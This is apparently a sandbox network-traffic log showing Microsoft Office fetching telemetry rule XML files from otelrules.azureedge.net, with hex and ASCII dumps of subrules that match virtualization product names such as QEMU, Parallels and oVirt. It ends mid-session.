                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:23 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            58192.168.2.44979713.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:24 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:25 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:25 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 485
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 9ca94d1e-301e-0000-0f9c-3beecc000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111025Z-1777c6cb754rz2pghC1TEBghen0000000ay000000000672n
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:25 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            59192.168.2.44979913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:24 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:25 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 470
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 137cb315-101e-0017-3264-3b47c7000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111025Z-178bfbc474bv587zhC1NYCny5w0000000180000000007v2f
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:25 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            60192.168.2.44979813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:24 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:25 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 411
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111025Z-1777c6cb7544nvmshC1TEBf7qc0000000avg0000000059r0
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:25 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            61192.168.2.44980013.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:25 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:25 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 2deeee2f-b01e-001e-4967-3b0214000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111025Z-178bfbc474bfw4gbhC1NYCunf400000001f0000000002b8f
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:25 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            62192.168.2.44980113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:25 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:25 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 502
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111025Z-1777c6cb754dqb2khC1TEBmk1s0000000b1g0000000033wc
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:25 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            63192.168.2.44980513.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:27 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:27 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 164a21a0-201e-00aa-18b8-3b3928000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111027Z-r1d97b99577mrt4rhC1TEBftkc0000000a4g000000008zbn
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:27 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            64192.168.2.44980413.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:27 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:27 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 04c68412-701e-000d-5268-3b6de3000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111027Z-178bfbc474bxkclvhC1NYC69g4000000018g00000000ap81
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:27 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            65192.168.2.44980613.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:27 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:27 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 8d96ff29-301e-0020-36b1-3b6299000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111027Z-r1d97b99577n4dznhC1TEBc1qw0000000a7000000000cndd
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:27 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            66192.168.2.44980713.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:27 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:27 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 469
